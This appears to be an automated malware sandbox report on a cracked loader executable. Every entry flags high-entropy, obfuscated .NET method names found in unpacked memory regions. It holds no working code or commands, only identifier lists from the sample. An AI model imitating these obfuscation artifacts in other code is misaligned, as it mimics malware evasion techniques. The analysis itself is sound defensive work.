            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, KQdiKeKO1yr7g8kh4UY.csHigh entropy of concatenated method names: 'ckJNI592mZ', 'K7INcB1Ylf', 'QYgNC3Gahk', 'OyTNGvFOKa', 'lFJNM1bPk3', 'bHXHafL2Vbgv2bETvyT', 'dvlndsLSxsfPlBC4gSy', 'VR5PAcLCoiv4RvJfUek', 'hA98pMLER4vPHmltxil', 'quN8TkLu0cTSH8UGt7Y'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, PgZXc9RXyTK9oTr0lMn.csHigh entropy of concatenated method names: 'IjKZu2xpR8', 'HeNZxC6oi4', 'SHlZDqaUq0', 'mWa5cB8hDZkuDqR4rw0', 'e9doOg8mP8rGJgWL0Nn', 'huTXJX8FJkee9QyyjH6', 'Jo0uK88c7DnHloLVYxB', 'XovZesb2Pf', 'WTPZorSu4x', 'PJWZHSKqUZ'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, uiKX91lEy27eHmxVmOh.csHigh entropy of concatenated method names: '_0023Nn', 'Dispose', 'F8qKxEyjGC', 'yIoKDypiKX', 'b1yKB27eHm', 'GVmKEOh5aJ', 'c9DKInNSmN', 'Lt8RRT0eU6Kb4mMTIQW', 'cYYG0u0lv8SwcDWu3qG', 'rYqg5x0yufeFQkAFjXP'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, pjU1xV972YyawOghLYj.csHigh entropy of concatenated method names: '_6H9', 'YZ8', '_66N', 'G9C', 'CrvR36p351q4rtc9MEp', 'PlWrB9pXJY40832LlfR', 'aLI4fkptjIRnKBHdOW4', 'qQxLtrpkMWpUvNfk8Xo', 'Oj3i76pfUwwXTGkCkDY', 'HeJo6rpz1cX1OoA1IhJ'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, Bi4nhU9g2E0ZrvHeMGg.csHigh entropy of concatenated method names: '_589', 'YZ8', '_491', 'G9C', 'SmngsnAVw28tbT0ejQw', 'll3XFPAIeQNFJuAKqOk', 'biVlcIAMOhGqQxvK66w', 'yIx13mAOBbmQALeiHW2', 'JYb2f8AR1YKhggYtV1k', 'dq8n9WA3QIc7b08YwjG'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, mK9uj03h95WWacJtkcv.csHigh entropy of concatenated method names: 'IGD', 'CV5', 'DEQdNohDJ3', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, t0ASy73kLI0VDtXhKyu.csHigh entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, JMMflX9wZUOjcVJJ1kn.csHigh entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'Ek5Gt2yyrg0NGvBE7oK', 'SAlkisyYhhPtxSgrMSi', 'QV1jO9ye92e75cK1L3g', 'wvtKcrylnbeM42HDXVn', 'GvKjBYyAVca17aehr8C', 'n38Sh0yjscYZ1P75nle'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, e9gKEc8j4ccPPjIvJc.csHigh entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'Fyncsbus5', 'g2RtcPgGN71n0R0HLkr', 'QNiqeWgJjK1ZuFphij5', 'eUXmpkg8VbUruG6xdfm', 'Hklig6gwFaXNmCU2ldE', 'Kqr2RIg5YkmgMGbJQ2D'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, bPQI7ERoRB9E7CghuZ0.csHigh entropy of concatenated method names: 'TdaZ4hmt0n', 'i02Z2eaXc2', 'UeCZt3rkJ9', 'gMeFmJ8sS7DtHB15WYu', 'to4wbs8qFB8dc5yhvk6', 'LhWKt78D8gob7wjC5Ie', 'HMU1jL8VelvfSMtfOic', 'Jq3ZA78IZwDyxBOTuET', 'u9fi4i8Md9AChomx14B', 'bwsS8A8OtKOaxhxVVa8'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, WnhZCTvNt7pAc8upimk.csHigh entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'SRPj6F5BCh', '_3il', 'ceNj9W0KYc', 'B9kjloN1c6', '_78N', 'z3K'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, FcG67VRPX0ukIu8AsNZ.csHigh entropy of concatenated method names: 'Mm6wenY5uf', 'D8SwoRh15s', 'DqMwHeoS9u', 'fsJPB6wTM6IZvxSAyES', 'GTOLThw9H22ZOB4HrHl', 'F1Vkq1wiBpLfH8wAMJN', 'P6ASDLwHlpsXxCrteYs', 'S6ow3ESDvf', 'csyw71PREi', 'lnawZWR8E3'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, Bx3xFGavu7JDAx3ga8.csHigh entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'mPD1ZIgA9ytnne4gIxx', 'JlxTn8gjapJMj0uMrc7', 'TaSRYIgmQQVkJbAgJ3s', 'fw2MuwgF3dr1Dd0yf0k', 'Sq4Y96gheYYax2aZ4Xy', 'EiZAsOgcdfikQb6leKm'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, TaHsAXlw4FpSEGPMUxv.csHigh entropy of concatenated method names: 'coWR1G1FuX', 'ml8Rugb4vK', 'D2WRxBK01F', 'gnURDcsTZE', 'jb9RBfxnXR', 'EtLRER4SPW', 'pxmRIQfxDH', 'Quw3QkF1D6ZG04dhJnC', 'MYd39pF5yOqpZpuGxvK', 'SWqtxeFKFxbWlrZ1FNv'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, jVvmDbVGlxm7LTy0MJ.csHigh entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'ncuKyEUTappSDQKiNuG', 'XDpDlWUHFYK18FKZtEa', 'RDii66UsJwVn81M8oZZ', 'f0GZEIUqrYVxpGbG47x', 'eYR3h0UDVbB5DcmjexV', 'aUtIldUVBJVHjHvM1on'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, ncbOUZvgUIhYx2a4pMk.csHigh entropy of concatenated method names: 'HJdiWLpD7s', 'OkfixJiUKQ', 'sWqiDjD03I', 'LskiBB5u2X', 'u0ciEgA9Hi', 'NNgiI3pMAI', 'mAcicvajAL', 'RLuiCyEitq', 'wb5iGJk6Dl', 'a2liMMJGWd'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, f4UGf9RNywmjIhFCXBq.csHigh entropy of concatenated method names: 'Ox4w1ZnmNd', 'D2Cwu6vTpk', 'yVxZrq5dXJ2SILFQ9tM', 'cRE7KB5GPEeIcVL5css', 'Kf2w8M57BBUgA1hPKxo', 'ReYxjA50MqlTXjy2sG3', 'qX2dQW5JBACUXdrB0tw', 'z1bJcI58oLA7xY6paRN'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, aoESDvvHflsy1PREijn.csHigh entropy of concatenated method names: 'odervpgFCw', 'ggWrKuXZMX', 'gnlr3GBcGL', 'zcwyLaS71KViECpqdV5', 'dMD7a1S0IfQxYCh3PKH', 'aJGdxXScnq01CrBUHSC', 'HEY1iNSZSdusDNNyATU', 'PeL9gESd0qR6nKucvWg', 'BHoiuASGcjMeL1lQGYG', 'EvgGyBSJRPFyxuq8NCF'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, PecDwktA7vOoh6WQMn.csHigh entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'wj4JxhWcMWqShjstZHB', 't7kKRcWZL4aUuBSrDys', 'b4pUKIW7ClRtfekBUX0', 'NOpN5AW0JZEhovPDPBs', 'CgDW0XWd9IgC5sEnAkF', 'Cq89jaWGX9nFRj1bh0O'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, bsYIHC9VlusmyTqEt1o.csHigh entropy of concatenated method names: 'uP1l0EWHi8', 'qftlysWbuM', 'QCJlQXAjfeanMEkJVZw', 'xkA28hAlXebVS74YGy8', 'MBxuQrAAFIKPhlEsvTc', 'QMFo23AmJkZo7AmdLop', 'hW5MUDAFJTBuRUbsOAf', 'pSiwjKAh8mVSu9pAOsW', 'xqpF2sAc5BqGXPMxsyR', 'r2GkdZAZRGr3dBjgQQv'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, AtZO7HD7LggNi3T57O.csHigh entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'I79TkhgkLC9n50XsP2E', 'aWvLOggfITFSVoBb3uR', 'KjhJPOgzNOve4fCI8DV', 'cJIABoNx6BaFeT8GWiR', 'l6fMNFNrpBdU7WXOTC1', 'hI7weRNgT21L48Nq16g'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, Of3qevGHECnn50JMJo.csHigh entropy of concatenated method names: '_66K', 'YZ8', 'O46', 'G9C', 'fnqmV9UA72hIKKSsHTY', 'wG4fwDUjGEq8qyNatGl', 'cPRyB5UmwMjQZiSlayG', 'pB3n8HUFQYviSntviLg', 'V9vhPeUhqHKc4Lm7Im1', 'KGieKLUcbMXnH5HHVVS'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, gg2GRPlxt5O8H9qFbHW.csHigh entropy of concatenated method names: 'O7gKS2GRPt', 'VHfqNb7kcZJI05PbLai', 'd3NqM37fylmvgZBhcZ6', 'YDVUiV7Xj83unNsQoBL', 'fcknvx7tPe0u9S6gxPl', 'LD5WJC7zsgBhiq0tvTx', 'wMumZZ0xrxugPqS4Py9', 'JUy0Zv0rj7XRLmLT83p', 'eZS9eS0gSQD5Bixxc6C', 'WRmjrr0NoX9CwUNGRIo'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, uWJtAR9o9PjlxWL4lFK.csHigh entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'dEOkqMyO2PNCOH7Ho5L', 'OjnainyR8Fjwc2dQ8Wo', 'YU4tYKy30h63Qlvtdhv', 'hN0CNRyX4IG1hbo8eOn', 'PQVIb2ytRLWTYdS36gq', 'xZaelDyk1pPH41YXo1k'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, VInybP7k0ixBkseEAD1.csHigh entropy of concatenated method names: 'Tfj8NKmpOh', 'bSx8k7QxNU', 'oyt8d14TZb', 'kce8OSFEOx', 'S0I8a1Ro3k', 'CIT8q6x0v4', 'N3Q8SeFqo9', 'UvA85rNyMc', 'llC881TTGG', 'NGm81vY57R'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, Jmiyo69tB8oRYqcLHMT.csHigh entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'TpOS1pAb8ng9tqBEV49', 'TitlTMA4mjbVMucuZRS', 'AdFQaHAnZcdyqa7s0uV', 'PgJPTtAQCBrLKibKFOF', 'XMLH74AP9glh1SZ2mcK', 'SlZ9D6ALo0ii6xUKoew'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, CoVvi9lYLyxTnXKOuL2.csHigh entropy of concatenated method names: 'Tns7kpWlxG', 'lewTyxdIr3OkTTobvQQ', 'zIUEKudDT9dCVKMfOLq', 'dJoCNUdVLyS8JYrHOoc', 'nGt0OkdMNGE7pYjnp04', 'XgtAsodOAIGX1PFS6t3', 'NeN7FjSBUH', 'mAL7PaG99L', 'NO57ULQC3Y', 'jt77mG3Qjb'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, SRPF5B3uChleNW0KYcq.csHigh entropy of concatenated method names: 'InMZ4KTU5ZoafkUaiAK', 'trVXL4TWs8trW261SpJ', 'SCxCS8TgZjO3E2Y5Bii', 'yqf7PLTNL22pB87Op9L', 'kDjOxAxSiJ', 'WM4', '_499', 'wY0OD48yL3', 'lEqOBAmhcV', 'LkROEBI8ff'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, qerjpp94FVH9SYQEuJe.csHigh entropy of concatenated method names: '_625', 'YZ8', '_9pX', 'G9C', 'FdZoIBA8OoLwYY3W5wE', 'pUrkuqAw2Nt5rc6fFjf', 'rOJBvDA51ffNxxQMoL0', 'jXCny1AKuHSatEDppjr', 'aHUdrFA14kjfP4uEQnL', 'MMSS2JAvnxhZKH7MRT6'
            Source: 0.3.NewLoaderCracks_1.32.exe.533cf90.1.raw.unpack, RWBK019CF7nUcsTZE0b.csHigh entropy of concatenated method names: 'gt5l93NGes', 'KALllYadky', 'nLTlRmROYB', 'ypMkn2lMBfeVM6kSdvU', 'yjbd3IlOtB7JkanJqJs', 'z4KRunlVrRX7QFmEOw1', 'uxLiWwlIWbAcMtlu8cC', 'mpW34ylRUVR1Oo0ZuQ8', 'qmCroJl3LHM8X7ivlQZ', 'aNjthVlX8PAqnFR2ZsC'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, v6luaK3qSQdG78Cyn9Y.csHigh entropy of concatenated method names: 'UbyOwveBBZ', 'OeNOXiTnsX', 'xhDO0B6XP6', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'WbfOykEdX4'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, pC7UlOvJvi2hqAkL1D8.csHigh entropy of concatenated method names: 'InaekceOgP', 'CXkeOXy8Iw', 'jUFej3DsLU', 'USjei6u0yo', 'RRieeQJHf2', 'W0OeoIfJdo', 'XSJeH3qTdG', 'GnYefWlxQt', 'J6qeF11k6K', 'jPyePgINBt'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, rmnQxrKweXovxmYFfo7.csHigh entropy of concatenated method names: 'cchNUIkh25', 'zUPNmOjQPP', 'qIJtIOPRG1ZjvXiH1qI', 'mG3Hf1P3cSRYYytdcXP', 'k5OrShPXjSrcIKPLShu', 'Yf1mLSPtaFUUp5bvmp0', 'y3nrD0Pk8RCVZA9NTqE', 'kdLJ9PPfxy75un1r0M0', 'bwoIcUPzudKKsLwKOBl', 'eIwaquLxYE5QaMI2sZn'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, N43Em13sOK0bOJdFKYn.csHigh entropy of concatenated method names: 'PJ1', 'jo3', 'uLbSwvYDkJ', 'F7kSXo5Oq0', 'Ye4S0ejdP2', 'EC9', '_74a', '_8pl', '_27D', '_524'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, EEuZ9r38tkfgiKsc6S5.csHigh entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'FAyOkJskxn', 'PUYOd208e9', 'rfxOOXcpmM', 'f6rOaDuBaH', 'lktOqeFjmU', 'uv3OSMaq1f', 'n36wJviLJSCZkVIRe71'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, bpHPos9OBbZYq4VcBpa.csHigh entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'oR90DvYf751JLVGVH2I', 'OpbxXnYz9Q16Rs8bpTf', 'GposnRexhWIGTr9BHTW', 'U95QuMerdImuIqIV1Ak', 'mLjsyiegIr0cj1ECjZw', 'pX2qL1eNbP6LFUMrb8Z'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, miph6a4RmaFZ1Nl1NL.csHigh entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'efuPsWWpJqBijSMTupx', 'iZNWhZWyYcpBcPkS59V', 'jumLsRWYBuDggxwt2jp', 'kXZdb1Weu9xqVlesb44', 'z8ljwlWlCXFredEF7ml', 'DNq2YFWAlFUf4Mm9y6l'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, t4CLPVs2O746c94BsC.csHigh entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'NpbC3ZU0p5NkaIktSx5', 'oTGmtLUdZ91AeqAVlIC', 'W5VvsXUGIVLFI0QAfVn', 'n7creJUJsBerPLqj2JI', 'IkKqaaU83biX38lY8iC', 'yJ0Yc2UwhDNBvrSuwOY'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, YKi3fZ9hlb310txy1Nx.csHigh entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'TDN17SYQ4qWF0NvupFs', 'AhdeobYPubtuci9IuGJ', 'BGsbkxYLGUE2lyfxMol', 'CxXm5jYabGXEy1jwc6l', 'frWUSTYBtUkRC0Te2vS', 'Wkv6FnYodj5P7DdQrcB'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, SSylUP9EuEheEVLMLoR.csHigh entropy of concatenated method names: 'tSK9W692gs', 'aAOlp0lLcNB4TYQckAS', 'KtNQojlaTUIk9ytOT40', 'zG1s5RlQrBNr9yOoHQm', 'W8eiMXlPAo06WJCnY4R', 'jrTPDMlBULIWwgBQM7N', '_3Xh', 'YZ8', '_123', 'G9C'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, ngF7YCRzpDtcgD33ll9.csHigh entropy of concatenated method names: 'hqeXaX3rRb', 'lyrXqmtEXt', 'jBeXSG2g9X', 'GeWAIM191yrIR7LIPxu', 'htlZbX1i2ajK3BLNi1l', 'wxEibH1B3iYH9Uelhmk', 'TUfEhl1oGUqBxp1VsPW', 'iQPpZe1TxySbViodSA4', 'pUVMJq1HwGDIcthXSxi', 'APR4wf1srd4wmi2wnhg'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, Ff88SRvmh15s8qMeoS9.csHigh entropy of concatenated method names: 'zatrunhjW2', 'XhXrxPBiK9', 'Fj0rD95WWa', 'KJtrBkcv0s', 'BowrEfsyQE', 'C4K08fSQnd6EpLS9WPX', 'MVBux7SPGPAUCTasrn6', 'iLfGAgS4lv8RXgFXBR7', 'aNJ5xhSnm0PcMTJ1lFs', 'Nh4ZUYSLwl1Ks8DstFr'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, wfmoFF7hiRD3cgB0IB.csHigh entropy of concatenated method names: 'toFjFhiRD', 'aNIQtr4UNoIW4YXPDY', 'dJWV3x63FI3nIGZZY6', 'NaH0WLba30QKdVZ1K8', 'vaxaYHn6caHt4oyBWn', 'jjc89tQ8NyExDy1DXx', 'VCYlBLvOI', 'uCERqN71G', 'IGqv92bCq', 'jp1KNowJ6'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, n0t0pSlTO21awwWGEMh.csHigh entropy of concatenated method names: 'piTvm04MpM', 'FVxvpl6Feh', 'O29vTElPEn', 'dgVvh7XuGZ', 'qiNvNXq2k1', 'dnAmgQZxmkjM05ZNAW4', 'wnVRWPZrnXZAOjFWu9x', 'OLFvLKcfL3OTtLUUSGn', 'UqlkV4czxp6kEFWui1B', 'xFhyK0ZgCReDkXMUVFa'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, s4k6M29947Pd4eU9gQX.csHigh entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'O1mXrNpGeywXXCHv5hG', 'PdVPW5pJGYXZLTfdVAp', 'RYcxgup8yu8t3msQRiK', 'KFXH3hpw1dbKdeyxG1E', 'KYbpQtp5QekFTQAKu5A', 'UbNhxlpKckVmBNhbjqa'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, aUhb82JNGmSK692gsl.csHigh entropy of concatenated method names: '_88Z', 'YZ8', 'ffV', 'G9C', 'Cx5ROSWHMYC5VC6oCnP', 'Urrjs7WsPAjJyc60TOZ', 'Mhw0axWq0ZDKGFoGHs5', 't5JtcCWDv1rLQkormq9', 'BSOvW9WVP4ayInFXWuG', 'VLiPeXWIfgnJnw8Tvgq'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, RNPKDLRgnTWovsb2PfJ.csHigh entropy of concatenated method names: '_269', '_5E7', 'PQXAY7VWLI', 'Mz8', 'yohA7TleOU', 'OP1F14KMF4kj7I4bm5Q', 'KTt6cgKO3RuPk7vQ8aU', 'kEl3iAKR9ON6jrrD1KN', 'ha1GFeK3RyCXTPAArw5', 'muffLoKXqwKU5kwGwGF'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, zPI4UC7j83EwXD93Buo.csHigh entropy of concatenated method names: 'l25liIsSVRAXkTxhLoT', 'kRCHdrsCZmYs8K5oHpY', 'cTTwX2s1iN28bgeyNcP', 'LGr1r5svF1wdi82OCj1', 'Fcl8iXx74V', 'sOHDvOsuClk44daZQ4g', 'ITwhOPs6YmOKYDicVB8', 'uG4K4qsb0xa1LiMrm47', 'aKhPols46I51NIIFjjh', 'DkSo2msnJdwGX0u8XoL'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, zBhiTPvKhTWbp26i2p0.csHigh entropy of concatenated method names: 'pY8yHFUs5G', 'aUCCrsvdwjoMe4LBmZZ', 'SjOoHVvGoD9gA7bhYmr', 'rhXaAxv7HkjLAKVVa4a', 'bejCuev0EgmIHetNxmF', 'BARX5oQXfK', 's9xX8C9TXM', 'v7vX1ol8mo', 'OYiXu0FVCX', 'R4XXxYYjao'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, LqC3sHlqHwtkwo6WEcx.csHigh entropy of concatenated method names: 'mnqvWGuQpD', 'I3gvYhqYsf', 'MGRvznbE1i', 'ITiK6o6LT3', 'dyWK9K3kSS', 'ybHKltf92S', 'IbtKRNuRTP', 'GNbKvWoAlK', 'u9PKKHe0t0', 'x9mZ5fZ3x5ZJG68aGVV'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, x53ABG9f1owHDDKBaS3.csHigh entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 'qV714oYxEu5IA2a3IyF', 'tdCyEVYrg90xmuk4ey3', 'bwC1yfYg8T5ahHZGFaF', 'LrLyhWYNYKnYVp4WCZv', 'kCOJKvYUdWmWYgv5nkd', 'qNKUBqYWEbuDaorAp4Y'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, vVOmPGvrq31DO4wGvpR.csHigh entropy of concatenated method names: 'R5nyDoZ5tK', 'DwTyBrHcuW', 'kk9yEV8q9Z', 'b9gyIJCf9Z', 'EeuyctOC8U', 'jRTHRsvfDsnDW4YldbC', 'LXbZTHvzS3aRgR9ypIf', 'tQHYTlvtoJJ6V43XY8w', 'nhcgyQvk9bof5Qmiq6d', 'ixvoDiSxBCp6UFJKX25'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, bIFPV1lcgwYDSDD5lM3.csHigh entropy of concatenated method names: 'bUo3Z5cfiR', 'gCx3wimkVY', 'qfuKiS03euwGOCRsh0W', 'BMIA9Q0Xq5UEHcenUUI', 'dtHJU20OQiAFIO5ANvA', 'E5ecsj0RPxCCbXlN4Se', 'oVv3Hi9Lyx', 'vrioWWdxPAAeEAOZh5e', 'OkLqyudr2pemMUuLDdk', 'SmEmKA0fUF0UgZYyBEc'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, JeBQwbdky5DS6jtXTP.csHigh entropy of concatenated method names: 'WHsxJy1sc', 'u2WDYPxEk', 'aHmBs3h3r', 'ege99wran3LKLhyMRgP', 'i9kMHprPcg7MLdfjQrS', 'uFaJDVrLJbcmY4mMoMt', 'c2rpZnrBoiUKMnDlhee', 'gIBPDWro1FcnGOkEtvy', 'yebZsKr9hnYS0xnOuhX', 'mhmQE5riEYTBa61AsV3'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, qdhFZ8R4DvSTxeWyhpd.csHigh entropy of concatenated method names: '_9YY', '_57I', 'w51', 'i55A28VT4E', '_168', 'wh4ZssKvk0oUHRnpIPh', 'pWB19ZKSXxIDgPLmwpM', 'Fqn38NKCyuOckWts74a', 'zoMDN2K2u7HS2s9nuZw', 'brUvuJKEEsPq7wABrSx'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, hDc22q36rjYl7cot4V2.csHigh entropy of concatenated method names: 'Gh5kLPB2Ov', 'kFnkVYtcxi', 'Gdrkno7VIK', 'TH8k4bfWZ6', 'lXtk2XA0DL', 'es4ktcEykF', '_838', 'vVb', 'g24', '_9oL'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, gWl6xsRsO4F1ET3XU7j.csHigh entropy of concatenated method names: '_5u9', 'hLLAwVhSAi', 'KM6X61hMyw', 'WrwAtwsyJM', 'mCKeOY5tXQeMwS6MiHG', 'v9FKKJ5kQ9RTBpF7hye', 'GCBKyX5f1waRepCJ85T', 'TrVFHr53drf9y9BDftT', 'Ba8k165XPXWXtEIPSsh', 'KB1lyd5zhIZrA5XYv5A'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, Kt2Y7f9q06pPifGXJIv.csHigh entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'OF6sUBePE6BtaE3Kuth', 'jo2OSGeLZQCihT7DSeP', 'bTYDhYeayv0ue773mIo', 'tISHVAeBJK3JyVTc0WR', 'XUbls3eoaS4tr8O1Zld', 'fKvWaue9899EEIL168C'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, OoKQBd9PQOIINrUiJIJ.csHigh entropy of concatenated method names: 'nvH9SECnn5', 'EJtkr9Y02dd1A38WfQl', 'XlHpHOYdWQf7eQiK3TE', 'WVUDHHYZBVdAyebjYG9', 'lG30BEY7V9IcpZdKkVL', 'jf43DHYG4UQNuA9wAeg', 'wDNYDYYJJOjAGWOYYHM', 'OoP7uAY89U3psKsYPh1', 'C0ckiUYwef8IS4J0kWI', 'f28'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, tUR51qRtos8neeSCfCF.csHigh entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'KRAX0V5agb', 'pBIAOwpU4N', 'BVnXyNYHGn', 'QSmAdTpoPh', 'tIS4B5KaehkqaEXNWVO', 'Ek9kscKBa9VD0kLhBRt', 'KTxkDuKPNsRwAANJxf6'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, s6gHsPvOqP2JDMQnOmc.csHigh entropy of concatenated method names: 'J5yjuhKgDq', 'iILjxvlJMS', 'iv5jDGxkJ1', 'aPtjBEwN4V', 'YP0jEhUOYu', 'R0kfhECGxgpsocX10dM', 'NkwZHtC0HtaO4Q1lUQq', 'EQQQPRCd2INaDLUgP93', 'WbfQd2CJ2MQlmW0EuGx', 'RP9RK3C8hWX6nOLiBP8'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, VsKPJfRrqU3kOWT58HW.csHigh entropy of concatenated method names: '_223', 'DyYk3t8078Xls8GcoPP', 'FfYd4F8d8HoBmL5CqR5', 'Kskasr8GaKO41fREd9M', 'HuoGNd8Jm5tuSa6awmA', 'oUExc688tSyeHKK1Utc', 'YoDYYH8wL1wwGyrAPgO', 'INVPkY855VEwi5Hk9wo', 'c79KOZ8KeBDh3NkbVJQ', 'IT8FCp81k70nebsS7fw'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, qaeqiIKANYedU44nENd.csHigh entropy of concatenated method names: 'vT1kvNUqqj', 'OmTkKTboCX', 'YXEk3hbTqu', 'MPDk7suR6d', 'a3qkZk6930', 'ztpkwYWJKy', 'rhnkXmkoqO', 'QG2k0fm6gG', 'ScrkyvZfkt', 'CBhkrbdtO3'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, q91kAv9rFvHpicluOel.csHigh entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'HaH8HHyCXGop8YKgc1a', 'APchiSy2kqWw91PSEOi', 'GZ05PByE3sk4o0EOdv8', 'NhawT9yuGjHFVrCrgEk', 'Ir1woFy69AlQfLYVGYL', 'lRfe8mybEU5OwPbnAHD'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, wyJFCl9x9fYR1NwiG31.csHigh entropy of concatenated method names: 'F7E9gcvwr6', 'MUfj3Ul1pG5vZJ2Ev1w', 'GnXQUwlvbLFmx0ghYdg', 'l6S47Vl5JIEZ3oVoNB8', 'Cplf9RlKcedFKl2UfKh', 'fk8aCIlShZqeJ5obuJr', 'QLw', 'YZ8', 'cC5', 'G9C'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, aTrJGWKb56QoYmFQAQO.csHigh entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'HVakhyUyrY', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, PL0IiPRfXfjK4KIr5xd.csHigh entropy of concatenated method names: 'hfOZQykpe7', 'X0kZgyn0Ye', 'iGXZAe2Oy0', 'wFBZJ8TVOm', 'sGqZb31DO4', 'b3r8bpwpvlVFM1YtCxV', 'DZdmsgwyN68LpPpt5vZ', 'KEa5NUwUNkJeX94d9c3', 'AfN6ljwWAOI47SHnqPd', 'ohtw2dwYARJiUSnoAPL'
